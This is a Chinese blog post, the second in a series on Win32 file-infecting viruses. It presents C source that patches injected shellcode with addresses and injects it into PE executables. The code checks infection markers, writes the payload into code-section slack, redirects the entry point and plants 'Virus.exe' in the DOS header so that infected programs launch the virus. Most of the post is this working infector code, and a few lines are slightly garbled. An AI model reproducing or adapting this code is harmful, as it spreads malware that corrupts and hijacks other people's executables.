关于感染型病毒的那些事(二)

最新推荐文章于 2022-08-05 10:04:51 发布

GaA_Ra

最新推荐文章于 2022-08-05 10:04:51 发布

阅读量2.6k

点赞数

分类专栏： Win32病毒文章标签： dos buffer windows system byte c

本文链接：https://blog.csdn.net/gaara_fan/article/details/5699512

版权

Win32病毒专栏收录该内容

8 篇文章 0 订阅

订阅专栏

从(一)中建立了初步的注入代码后,需要把用来占位的11223344H改为相应的地址,用一个函数来完成.

//OEP是从PE头中得到的程序入口点,VEP是病毒注入的起始位置,ImageBase是文件基址 int BuildInjectCode(DWORD OEP, DWORD VEP, DWORD ImageBase) { unsigned char *p = InjectCode; *(DWORD *)(p + 1) = VEP + ImageBase + 0x2B; //SEH处理程序地址 *(DWORD *)(p + 15) = ImageBase + 0x53; //病毒名,这里我写在了PE的DOS头中 *(DWORD *)(p + 20) = aWinExec; //offset WinExec *(DWORD *)(p + 37) = OEP + ImageBase; //原程序OEP地址 *(DWORD *)(p + 43) = OEP + ImageBase; return 0x3E; //0x3E是InjectCode的长度 }

利用Windows搜索文件的特点,如果将病毒放在System32文件夹下,那么,WinExec路径参数只需传递病毒文件名即可(如Virus.exe).

打开文件进行注入感染,过程是:CreateFile()->CreateFileMapping()->MapViewOfFile()->InjectHelper()->UnMapViewOfFile(),CloseHandle().关键代码在于InjectHelper,是注入感染的帮助函数.用MapViewOfFile得到文件的内存指针,然后将指针传递给InjectHelper(),详细代码如下:

void InjectHelper(char *Buff) { //检查感染标志 if (*(Buff + 0x4e) == 0x49 //'I'注入感染 || *(Buff + 0x4e) == 0x52 //'R'资源感染 || *(Buff + 0x4e) == 0x56) //'V'病毒主体文件 { return; } char *ptr = Buff, *Section; DWORD temp, OEP, VEP, ImageBase; int i, NumberOfSection, LengthOfInjectCode; if (*(WORD *)ptr != 0x5A4D) return; //检查MZ标志 ptr += *(WORD *)(ptr + 0x3c); //指向e_lfanew if (*(WORD *)ptr != 0x4550) return; //检查PE标志 temp = *(WORD *)(ptr + 0x5c); //指向SubSystem if (temp != 2 && temp != 3) return; //检查子系统版本,GUI或CUI OEP = *(DWORD *)(ptr + 0x28); //取得原OEP Section = ptr + 0x100; //指向VirtualSize NumberOfSection = *(WORD *)(ptr + 6); //获取节数 for(i = 0; i < NumberOfSection; i++) //判断OEP在哪个节当中 { if(*(DWORD *)(Section + 4) <= OEP / && *(DWORD *)Section + *(DWORD *)(Section + 4)) break; Section += 0x28; } if (i >= NumberOfSection - 1) { return; } temp = *((DWORD *)Section + 8); //指向RawSize if (*(DWORD *)Section < temp) temp = *(DWORD *)Section; //取VirtualSize和RawSize中小的值 VEP = *(DWORD *)(Section + 4) + temp; //VirtualAddress+temp(其实就是代码的长度) ImageBase = *(DWORD *)(ptr + 0x34); LengthOfInjectCode = BuildInjectCode(OEP, VEP, ImageBase); if (*(DWORD *)(Section + 0x28 + 0xc) <= //利用原代码长度加注入代码长度 temp + *(DWORD *)(Section + 0x0c) + LengthOfInjectCode) //看是否覆盖到下一个区块的区域 { return; } MoveMemory(Buff + temp + *(DWORD *)(Section +0x0c), InjectCode, LengthOfInjectCode); *(DWORD *)(ptr + 0x28) = VEP; //修改PE文件的EntryPoint为注入代码地址 //写入注入标示'I'和病毒名Virus.exe,位于DOS头 *(Buff + 0x4e) = 0x49; *(Buff + 0x53) = 'V'; *(Buff + 0x54) = 'i'; *(Buff + 0x55) = 'r'; *(Buff + 0x56) = 'u'; *(Buff + 0x57) = 's'; *(Buff + 0x58) = '.'; *(Buff + 0x59) = 'e'; *(Buff + 0x5a) = 'x'; *(Buff + 0x5b) = 'e'; *(Buff + 0x5c) = '/0'; return; }

利用BYTE*指针(即char*指针)指向buffer来完成指针的移动操作比较容易理解,但是需要做大量的WORD和DWORD的转换,基本这样就完成了对一个文件的注入感染了.过程中没有引入PE文件头的各类结构,都是用指针定位,所以需要对PE结构有一定的理解.

To be continue...

GaA_Ra

关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
6
评论
关于感染型病毒的那些事(二)

从(一)中建立了初步的注入代码后,需要把用来占位的11223344H改为相应的地址,用一个函数来完成.//OEP是从PE头中得到的程序入口点,VEP是病毒注入的起始位置,ImageBase是文件基址int BuildInjectCode(DWORD OEP, DWORD VEP, DWORD ImageBase){ unsigned char *p = InjectCode; *(DWORD *)(p + 1) = VEP + ImageBase + 0x2B; //SEH处
复制链接

扫一扫